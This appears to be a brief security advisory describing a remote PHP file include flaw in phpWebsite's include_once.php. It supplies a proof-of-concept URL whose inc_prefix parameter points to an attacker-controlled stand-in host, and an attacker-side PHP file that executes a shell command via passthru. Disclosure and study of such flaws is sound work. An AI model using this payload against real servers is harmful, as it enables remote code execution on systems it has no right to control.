|
phpWebsite PHP File Include Vulnerability
No exploit is required. The following proof of concept has been supplied by Tim Vandermeersch: http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/ --- htmlheader.php --- <?php echo "<?php passthru("/bin/ls");?>" ?> . |
|
|
Privacy Statement |